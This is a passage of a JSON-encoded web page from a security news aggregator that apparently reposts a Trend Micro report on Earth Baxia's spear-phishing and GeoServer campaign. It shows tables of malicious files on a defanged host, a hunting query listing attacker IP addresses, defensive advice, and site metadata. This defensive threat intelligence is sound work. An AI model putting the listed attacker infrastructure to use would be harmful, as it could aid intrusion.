valign=\"top\">June 30, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation0630.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/yn.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" valign=\"top\">July 2, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation0702.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/hzm.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr>\n<td width=\"141\" rowspan=\"4\" valign=\"top\">August 15, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<td width=\"208\" rowspan=\"3\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/k1.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 3. Files hosted on static[.]krislab[.]site<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.083838383838\">\n<div readability=\"31.389898989899\">\n<h4><b>Trend Micro Vision One Threat Intelligence <\/b><\/h4>\n<p>To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.<\/p>\n<p><b>Trend Micro Vision One Intelligence Reports App [IOC Sweeping]<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>Earth Baxia: A dive into their aggressive campaign in August<\/i><\/span><\/li>\n<\/ul>\n<p><b>Trend Micro Vision One Threat Insights App<\/b><\/p>\n<h4><b>Hunting Queries<\/b><\/h4>\n<p><b>Trend Micro Vision One Search App<\/b><\/p>\n<p>Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment. <\/p>\n<p><b>Network Communication with Earth Baxia – IP<\/b><\/p>\n<p>eventId:3 AND (src:”167.172.89.142″ OR src:”167.172.84.142″ OR src:”152.42.243.170″ OR src:”188.166.252.85″ OR dst:”167.172.89.142″ OR dst:”167.172.84.142″ OR dst:”152.42.243.170″ OR dst:”188.166.252.85″)<\/p>\n<p>More hunting queries are available for Vision One customers with <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" title=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" target=\"_blank\" rel=\"noopener\">Threat Insights Entitlement enabled<\/a>. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.901461988304\">\n<div readability=\"33.54269005848\">\n<h4>Conclusion<\/h4>\n<p>Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries. They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations.<\/p>\n<p>Continued vigilance and advanced threat detection measures are essential to counter such threats. To mitigate the risk of this kind of threat, security teams can also implement the following best practices:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Implement continuous phishing awareness training for employees.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Double-check the sender and subject of emails, particularly those from unfamiliar sources or with vague subjects.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy multi-layered protection solutions to help detect and block threats early in the malware infection chain.<\/span><\/li>\n<\/ul>\n<p>Organizations can help protect themselves from these kinds of attacks with <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a>, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. The multilayered protection and behavior detection Vision One offers can help block malicious tools and services before they can inflict damage on user machines and systems.<\/p>\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<p>The full list of IOCs can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/IOCs%20-%20Earth%20Baxia%20Uses%20Spear-Phishing%20and%20GeoServer%20Exploit%20to%20Target%20APAC.txt\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-baxia-spear-phishing-and-geoserver-exploit.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9577],"class_list":["post-57136","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-phishing"],"yoast_head":"\n<title>Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\",\"datePublished\":\"2024-09-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"},\"wordCount\":2399,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : APT&Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Phishing\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\",\"name\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"datePublished\":\"2024-09-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","og_locale":"en_US","og_type":"article","og_title":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-09-19T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC","datePublished":"2024-09-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"},"wordCount":2399,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","keywords":["Trend Micro Research : APT&Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Phishing"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","url":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","name":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","datePublished":"2024-09-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57136"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57136\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":57136,"date":"2024-09-19T00:00:00","date_gmt":"2024-09-19T00:00:00","guid":{"rendered":"urn:uuid:1ba9287e-a244-50b3-736d-5c2f37476c69"},"modified":"2024-09-19T00:00:00","modified_gmt":"2024-09-19T00:00:00","slug":"earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","title":{"rendered":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC"},"content":{"rendered":"